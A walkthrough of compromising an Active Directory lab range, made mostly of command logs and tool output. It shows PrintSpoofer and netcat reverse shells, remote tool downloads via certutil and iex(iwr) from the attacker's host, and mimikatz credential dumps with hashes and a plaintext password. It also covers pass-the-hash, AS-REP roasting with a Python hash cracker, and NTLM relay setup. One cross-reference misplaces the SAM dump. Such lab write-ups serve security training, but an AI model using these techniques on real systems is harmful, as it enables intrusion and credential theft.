Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.56.22 - - [06/Apr/2026 12:15:19] "GET /PrintSpoofer64.exe HTTP/1.1" 200 -
192.168.56.22 - - [06/Apr/2026 12:15:19] "GET /PrintSpoofer64.exe HTTP/1.1" 200 -
192.168.56.22 - - [06/Apr/2026 12:16:00] "GET /nc64.exe HTTP/1.1" 200 -
192.168.56.22 - - [06/Apr/2026 12:16:00] "GET /nc64.exe HTTP/1.1" 200 -

.

bolke@hacky:~/htb$ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.56.22 50012

PS C:\Windows\system32> whoami
north\sql_svc
PS C:\Windows\system32> hostname
castelblack
PS C:\Windows\system32> cd /tmp
PS C:\tmp> ls

    Directory: C:\tmp

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        3/27/2026   9:39 AM         660143 GOAD.png                                                              
-a----        3/27/2026   8:39 AM          15766 vagrant-shell.ps1                                                     


PS C:\tmp> certutil -urlcache -split -f http://192.168.56.1:8888/PrintSpoofer64.exe
****  Online  ****
  0000  ...
  6a00
CertUtil: -URLCache command completed successfully.
PS C:\tmp> certutil -urlcache -split -f http://192.168.56.1:8888/nc64.exe
****  Online  ****
  0000  ...
  b0d8
CertUtil: -URLCache command completed successfully.
PS C:\tmp> 

 

On the CASTELBLACK side, move to C:\tmp as shown above; this is where the tools are downloaded.

On the Kali side, open the port using Netcat.

rlwrap nc -lvnp 80
listening on [any] 80 ...

Run PrintSpoofer from the PowerShell shell:

PS C:\tmp> .\PrintSpoofer64.exe -i -c ".\nc64.exe 192.168.56.1 80 -e powershell"

A reverse shell comes back. You can confirm with whoami that it runs as NT AUTHORITY\SYSTEM.

bolke@hacky:~/htb$ sudo nc -nlvp 80
Listening on 0.0.0.0 80
Connection received on 192.168.56.22 50031
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
castelblack
PS C:\Windows\system32> 

Next, deliver mimikatz.

First, make mimikatz available for download via HTTP on the attacker’s machine.

$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .

┌──(kali㉿kali)-[~/goad/castelblack]
└─$ python2 -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ..

Download mimikatz using the target’s shell.

PS C:\Windows\system32> certutil -urlcache -split -f http://192.168.56.1:8888/mimikatz.exe 
certutil -urlcache -split -f http://192.168.56.1:8888/mimikatz.exe 
**** Online **** 
  000000 ... 
  14ae00 
CertUtil: -URLCache command completed successfully.

Dump the authentication information.

PS C:\Windows\system32> ./mimikatz.exe
./mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : CASTELBLACK
SysKey : 881f6798ad7e885dd9ceb640861b988e
Local SID : S-1-5-21-433892155-3520358183-2691782032

SAMKey : 66806cf62270552d2cfded46f834d770

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: dbd13e1c4e338284ac4e9874f7de6ef4

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 7095ca3da6ecb7abc65a0b2c84b2389c

--snip--

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : CASTELBLACK.NORTH.SEVENKINGDOMS.LOCALpuck
    Credentials
      des_cbc_md5       : bc4594c2ad5d9b6e


mimikatz # lsadump::secrets
Domain : CASTELBLACK
SysKey : 881f6798ad7e885dd9ceb640861b988e

Local name : CASTELBLACK ( S-1-5-21-433892155-3520358183-2691782032 )
Domain name : NORTH ( S-1-5-21-2202107141-2946415091-3368881061 )
Domain FQDN : north.sevenkingdoms.local

Policy subsystem is : 1.18
LSA Key(s) : 1, default {4700b4cd-a6aa-7601-26b6-3c5cc324ab99}
  [00] {4700b4cd-a6aa-7601-26b6-3c5cc324ab99} fcab86c31556579a13b6deca3b198a4e9d74893aff3cd186e6e96d53dd4e543b

Secret  : $MACHINE.ACC
cur/text: >]N$&9 4X4k7u#0bij+?r2 AbvrtHuVM\e/qj^S-0RJ<T<zR./HRU3GNS&`RZHE'?d#*Oi(fJ9nT87',fopkB;@B-21K6<&/&v"6d..= P(E7hs4PwMDX"oB
    NTLM:0faddc16c56adadd3e13a71c9efba7bc
    SHA1:1d9a69e9e5fbdf5a0b658b2dc638d82097a35f70
old/text: >]N$&9 4X4k7u#0bij+?r2 AbvrtHuVM\e/qj^S-0RJ<T<zR./HRU3GNS&`RZHE'?d#*Oi(fJ9nT87',fopkB;@B-21K6<&/&v"6d..= P(E7hs4PwMDX"oB
    NTLM:0faddc16c56adadd3e13a71c9efba7bc
    SHA1:1d9a69e9e5fbdf5a0b658b2dc638d82097a35f70

Secret  : DefaultPassword
old/text: vagrant

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 7e 29 fa 8b 6d 22 02 27 80 63 5b 8f ff 16 44 99 ab 43 72 6f 20 84 98 40 33 98 10 76 dd dd 9d 84 01 93 30 f4 62 38 bc 67 
    full: 7e29fa8b6d22022780635b8fff164499ab43726f2084984033981076dddd9d84019330f46238bc67
    m/u : 7e29fa8b6d22022780635b8fff164499ab43726f / 2084984033981076dddd9d84019330f46238bc67
old/hex : 01 00 00 00 f8 8a ba f4 5d f8 7a f3 1f 7a 1f 2d 8f c0 48 de 9f 8c a8 77 c0 90 ca 12 69 d8 47 13 c9 de 69 bc 50 3e ae 27 c6 ea 74 26 
    full: f88abaf45df87af31f7a1f2d8fc048de9f8ca877c090ca1269d84713c9de69bc503eae27c6ea7426
    m/u : f88abaf45df87af31f7a1f2d8fc048de9f8ca877 / c090ca1269d84713c9de69bc503eae27c6ea7426

Secret  : NL$KM
cur/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9 
old/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9 

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : north.sevenkingdoms.local\sql_svc
cur/text: YouWillNotKerboroast1ngMeeeeee

Secret  : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS

mimikatz # 

.

Now that we have successfully obtained the authentication information, let’s try logging in using Pass-the-hash.

bolke@hacky:~/htb$ ewp -u Administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 -i castelblack
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.6.0

[*] Connecting to 'castelblack:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents>  net localgroup administrators /add jon.snow

I was able to obtain Administrator privileges for CASTELBLACK.

Mimikatz could also be run in memory with Invoke-Mimi:

PS C:\windows\system32>  iex (iwr http://192.168.56.1:8888/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'

iex (iwr http://10.254.110.123/ad/Invoke-Mimi.ps1 -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'
Invoke-Mimi -Command '"token::elevate" "vault::cred /patch"'
Invoke-Mimi -Command '"token::elevate" "lsadump::sam"'
Invoke-Mimi -Command '"token::elevate" "sekurlsa::logonpasswords"'
evil-winrm-py PS C:\windows\system32> iex (iwr http://192.168.56.1:8888/Invoke-Mimi.ps1  -UseBasicParsing);Invoke-Mimi -Command '"sekurlsa::ekeys"'
 
The following files on disk suggest we are running in a sandbox. Caution!.
C:\windows\System32\Drivers\VBoxMouse.sys
C:\windows\System32\Drivers\VBoxGuest.sys
C:\windows\System32\Drivers\VBoxSF.sys
C:\windows\System32\vboxhook.dll
C:\windows\System32\vboxmrxnp.dll
C:\windows\System32\vboxservice.exe
C:\windows\System32\vboxtray.exe
C:\windows\System32\VBoxControl.exe


  .#####.   mimikatz 2.2.0 (x64) #19041 May 23 2024 17:47:47
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 377827 (00000000:0005c3e3)
Session           : RemoteInteractive from 2
User Name         : robb.stark
Domain            : NORTH
Logon Server      : WINTERFELL
Logon Time        : 4/5/2026 11:17:57 PM
SID               : S-1-5-21-2202107141-2946415091-3368881061-1113

     * Username : robb.stark
     * Domain   : NORTH.SEVENKINGDOMS.LOCAL
     * Password : (null)
     * Key List :
       aes256_hmac       d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
       rc4_hmac_nt       831486ac7f26860c9e2f51ac91e1a07a
       rc4_hmac_old      831486ac7f26860c9e2f51ac91e1a07a
       rc4_md4           831486ac7f26860c9e2f51ac91e1a07a
       rc4_hmac_nt_exp   831486ac7f26860c9e2f51ac91e1a07a
       rc4_hmac_old_exp  831486ac7f26860c9e2f51ac91e1a07a

--snip--

Authentication Id : 0 ; 85975 (00000000:00014fd7)
Session           : Service from 0
User Name         : sql_svc
Domain            : NORTH
Logon Server      : WINTERFELL
Logon Time        : 4/5/2026 11:14:53 PM
SID               : S-1-5-21-2202107141-2946415091-3368881061-1121

     * Username : sql_svc
     * Domain   : NORTH.SEVENKINGDOMS.LOCAL
     * Password : YouWillNotKerboroast1ngMeeeeee
     * Key List :
       aes256_hmac       24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
       aes128_hmac       01290f5b76c04e39fb2cb58330a22029
       rc4_hmac_nt       84a5092f53390ea48d660be52b93b804
       rc4_hmac_old      84a5092f53390ea48d660be52b93b804
       rc4_md4           84a5092f53390ea48d660be52b93b804
       rc4_hmac_nt_exp   84a5092f53390ea48d660be52b93b804
       rc4_hmac_old_exp  84a5092f53390ea48d660be52b93b804

--snip--

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CASTELBLACK$
Domain            : NORTH
Logon Server      : (null)
Logon Time        : 4/6/2026 6:14:49 AM
SID               : S-1-5-18

     * Username : castelblack$
     * Domain   : NORTH.SEVENKINGDOMS.LOCAL
     * Password : (null)
     * Key List :
       aes256_hmac       5d5f0a147176cb3ccf5e01e722280d57e9efe94a7fd0f379701d4748c79ae47d
       rc4_hmac_nt       0faddc16c56adadd3e13a71c9efba7bc
       rc4_hmac_old      0faddc16c56adadd3e13a71c9efba7bc
       rc4_md4           0faddc16c56adadd3e13a71c9efba7bc
       rc4_hmac_nt_exp   0faddc16c56adadd3e13a71c9efba7bc
       rc4_hmac_old_exp  0faddc16c56adadd3e13a71c9efba7bc

evil-winrm-py PS C:\windows\system32>

 

.

Winterfell walkthrough (administrator privileges)

Check which users of north.sevenkingdoms.local have Kerberos pre-authentication disabled (AS-REP roasting).

bolke@hacky:~/htb$ GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile users.txt
Impacket v0.14.0.dev0+20260326.150834.76ee8774 - Copyright Fortra, LLC and its affiliated companies 

[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:a06395fe2b992f078ea697991f5beb21$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
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
bolke@hacky:~/htb$ 

.

I got brandon.stark’s krb5asrep so I’ll try cracking it with john.

┌──(bolke㉿kali)-[~/htb]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt asrephash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
iseedeadpeople ($krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL) 
1g 0:00:00:00 DONE (2026-04-06 13:49) 5.882g/s 316141p/s 316141c/s 316141C/s jack23..ilovme
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

.

That gives us a set of domain credentials: brandon.stark / iseedeadpeople.

We could also crack it with hashcat: hashcat -m 18200 asrephash /usr/share/wordlists/rockyou.txt, then hashcat -m 18200 asrephash --show to display the cracked result.
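To make clear what john and hashcat are actually testing for each candidate word, here is an added example (not part of the original walkthrough) that implements the RC4-HMAC (etype 23) check behind the $krb5asrep$23$ format per RFC 4757: the candidate password becomes an NT hash (MD4 of the UTF-16LE password), a usage-specific key is derived with HMAC-MD5 for the AS-REP message type 8, the ciphertext is RC4-decrypted and the HMAC-MD5 checksum in the hash line is recomputed over the plaintext. Because the page's captured hash is not reproduced here, the block constructs its own hash line for brandon.stark under the cracked password, with a placeholder body in place of the real DER-encoded EncASRepPart; MD4 is implemented in pure Python because hashlib often lacks it on OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is often unavailable under OpenSSL 3."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = rol((a + fn(b, c, d) + x[j] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers so the next step updates the next one
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (encrypt and decrypt are the same operation)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


ASREP_USAGE = struct.pack("<I", 8)  # RFC 4757 message type for the AS-REP enc-part (what mode 18200 uses)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757 encryption; returns (checksum, rc4 ciphertext), the two hex fields of the hash line."""
    k1 = hmac.new(key, usage, hashlib.md5).digest()
    cksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    return cksum, rc4(k3, confounder + plaintext)


def rc4_hmac_verify(key, usage, cksum, ctext):
    """The per-candidate test a cracker runs: decrypt, then recompute and compare the HMAC."""
    k1 = hmac.new(key, usage, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    ptext = rc4(k3, ctext)
    return hmac.compare_digest(hmac.new(k1, ptext, hashlib.md5).digest(), cksum)


def parse_asrep_line(line):
    head, rest = line.split(":", 1)
    _, tag, etype, principal = head.split("$")
    if tag != "krb5asrep" or etype != "23":
        raise ValueError("only $krb5asrep$23$ (RC4-HMAC) lines are handled")
    cksum_hex, ctext_hex = rest.split("$")
    return principal, bytes.fromhex(cksum_hex), bytes.fromhex(ctext_hex)


def crack_asrep(line, wordlist):
    _, cksum, ctext = parse_asrep_line(line)
    for word in wordlist:
        if rc4_hmac_verify(nt_hash(word), ASREP_USAGE, cksum, ctext):
            return word
    return None


def make_asrep_line(user, realm, password, enc_part, confounder=bytes(8)):
    cksum, ctext = rc4_hmac_encrypt(nt_hash(password), ASREP_USAGE, enc_part, confounder)
    return f"$krb5asrep$23${user}@{realm}:{cksum.hex()}${ctext.hex()}"


# Constructed stand-in for the captured hash: a placeholder body (not real ASN.1) encrypted
# under the password cracked in the walkthrough.
SAMPLE_LINE = make_asrep_line("brandon.stark", "NORTH.SEVENKINGDOMS.LOCAL", "iseedeadpeople",
                              b"constructed EncASRepPart placeholder")
SAMPLE_WORDLIST = ["123456", "jack23", "iseedeadpeople", "ilovme"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_asrep(SAMPLE_LINE, SAMPLE_WORDLIST))
```

The HMAC-MD5 comparison is the authoritative test; real crackers add early-reject shortcuts on the first decrypted bytes on top of it, which is why a wrong word costs less than a full decrypt. Note also that the key is the NT hash itself: if you already hold a user's NT hash you do not need to crack anything, the same check confirms it directly.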

Now that we have credentials for a user in the north.sevenkingdoms.local domain, let’s use them to run BloodHound collection.

Add the domain controller as a nameserver in /etc/resolv.conf so the lab names resolve (bloodhound-python’s -ns flag does the same job without touching the system resolver).

┌──(kali㉿kali)
└─$ cat /etc/resolv.conf 
# Generated by NetworkManager 
nameserver 10.0.2.3 
nameserver 192.168.56.10

Run bloodhound-python.

┌──(bolke㉿kali)-[~/htb]
└─$ bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: north.sevenkingdoms.local
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 3 computers
INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 18 users
INFO: Found 51 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: castelblack.north.sevenkingdoms.local
INFO: Querying computer: winterfell.north.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20260406135710_bloodhound.zip

That worked. Because the domains are linked by trusts, the same north.sevenkingdoms.local user can also enumerate the other domains; sevenkingdoms.local next:

┌──(bolke㉿kali)-[~/htb]
└─$ bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sevenkingdoms.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 16 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 9 ous
INFO: Found 19 containers
INFO: Found 2 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: kingslanding.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20260406135855_bloodhound.zip

Next is essos.local, the other forest:

┌──(bolke㉿kali)-[~/htb]
└─$ bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: essos.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 14 users
INFO: Found 60 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: braavos.essos.local
INFO: Querying computer: meereen.essos.local
INFO: Done in 00M 01S
INFO: Compressing output into 20260406135956_bloodhound.zip

That gives three BloodHound archives, one per domain.

Import them into BloodHound and it will render the relationships between users, groups and the trusts.

Before digging into the graph, check whether the Administrator NT hash we already hold (the local Administrator hash of castelblack, as the SAM dump further down confirms) is reused elsewhere. Pass-the-hash over WinRM shows it also works on Winterfell, the north domain controller:

bolke@hacky:~/htb$ nxc winrm 192.168.56.10-12 192.168.56.22-23 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4'
WINRM       192.168.56.12   5985   MEEREEN          [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) 
WINRM       192.168.56.11   5985   WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.22   5985   CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) 
WINRM       192.168.56.10   5985   KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) 
WINRM       192.168.56.23   5985   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) 
WINRM       192.168.56.11   5985   WINTERFELL       [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!)
WINRM       192.168.56.12   5985   MEEREEN          [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4
WINRM       192.168.56.22   5985   CASTELBLACK      [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!)
WINRM       192.168.56.10   5985   KINGSLANDING     [-] sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4
WINRM       192.168.56.23   5985   BRAAVOS          [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

That being said, let’s explore other authentication routes.

Next, enumerate which hosts have SMB signing disabled; those are the ones NTLM authentication can be relayed to:

bolke@hacky:~/htb$ nxc smb 192.168.56.10-23 --gen-relay-list relay.txt
SMB         192.168.56.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.56.23   445    BRAAVOS          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:None)
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

bolke@hacky:~/htb$ cat relay.txt 
192.168.56.23
192.168.56.22

 

Two hosts, braavos (192.168.56.23) and castelblack (192.168.56.22), report signing:False, so NTLM authentication can be relayed to them. The three domain controllers enforce signing, so relaying to them over SMB is not an option.

First, point /etc/proxychains4.conf at the SOCKS proxy that ntlmrelayx will open on 127.0.0.1:1080 (if not already done):

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat /etc/proxychains4.conf
# proxychains.conf  VER 4.x
#
#        HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4     127.0.0.1 9050
socks4 127.0.0.1 1080

 

Change the Responder settings.

Responder + ntlmrelayx to SMB

Before starting Responder to poison LLMNR, mDNS and NBT-NS requests, we must turn off its own SMB and HTTP servers: we don’t want Responder to capture the hashes itself, we want the authentication relayed to ntlmrelayx. If both tools listen on 445 and 80 they fight over the ports and ntlmrelayx never sees the connection.

sed -i 's/HTTP = On/HTTP = Off/g' /etc/Responder/Responder.conf && cat /etc/Responder/Responder.conf | grep --color=never 'HTTP ='
HTTP = OFF
sed -i 's/SMB = On/SMB = Off/g' /etc/Responder/Responder.conf && cat /etc/Responder/Responder.conf | grep --color=never 'SMB ='
SMB = OFF

.

Start ntlmrelayx:

impacket-ntlmrelayx -tf relay.txt --no-http-server -smb2support -socks

.
  • -tf : list of targets to relay the authentication to (the signing:False hosts)
  • --no-http-server : do not start ntlmrelayx’s own HTTP listener; only SMB is relayed here
  • -smb2support : support for SMB2
  • -socks : start a SOCKS proxy (127.0.0.1:1080) that reuses the relayed sessions
  • -of <file> (not used here) : also write the captured NetNTLM hashes to a file so they can be cracked later, as we did with Responder
Then start Responder on the lab interface:
┌──(bolke㉿kali)-[~]
└─$ sudo responder -I eth1
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [OFF]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [OFF]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth1]
    Responder IP               [192.168.56.104]
    Responder IPv6             [fe80::a00:27ff:feee:2051]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-8Q1R401PCMO]
    Responder Domain Name      [EXXR.LOCAL]
    Responder DCE-RPC Port     [46008]

[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder

[+] Listening for events...

.

